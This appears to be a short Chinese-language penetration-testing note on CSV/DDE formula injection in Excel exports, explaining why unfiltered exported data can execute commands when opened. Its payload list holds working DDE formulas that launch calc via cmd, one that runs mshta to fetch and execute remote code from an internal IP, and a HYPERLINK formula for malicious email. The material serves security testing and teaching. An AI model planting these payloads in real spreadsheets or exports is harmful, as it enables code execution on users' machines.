CSV 注入
和普通的注入差距不大,但是是属于导出到csv文件当中,当打开csv文件的时候就会造成csv当中的某些代码执行,当某些安全意识比较低的用户点开之后就会出现问题。
在实际的挖掘当中,很多TOb的业务当中存在很多将数据导出到excel的地方,通常导出excel的时候并没有对要进行导出excel的数据进行过滤所以就会造成这个问题。
一句话来说
不仅仅是一个简单的注入,更是dde类型注入,在office365当中都具有
前提
DDE是什么?
dde widnwos进程间通信协议,是一种动态数据交换机制。当我们制作包含DDE公式的CSV文件的时候,在打开文件的时候Excel就会执行外部的应用。
并且在excel的程序当中需要打开dde ,受害者需要配合点击 接受风险 之类的按钮。
其实在这里不光是 excel属于被攻击的向量office 365当中的其他软件同时如此,outlook excel 都是这样。
注意在wps当中却不存在这样的问题
常见的payload
代码执行
=1+cmd|' /C calc'!A0
+1+cmd|'/c mshta.exehttp://192.168.233.102:8080/a'!A0
=1*cmd|' /C calc'!A0
-cmd|' /C calc'!A0
+cmd|' /C calc'!A0
@SUM(cmd|'/c calc'!A0)
%0A-1+cmd|' /C calc'!A0
;-1+cmd|' /C calc'!A0
1+cmd|’/C calc’!A0
恶意邮件进行利用
HYPERLINK("urk","content")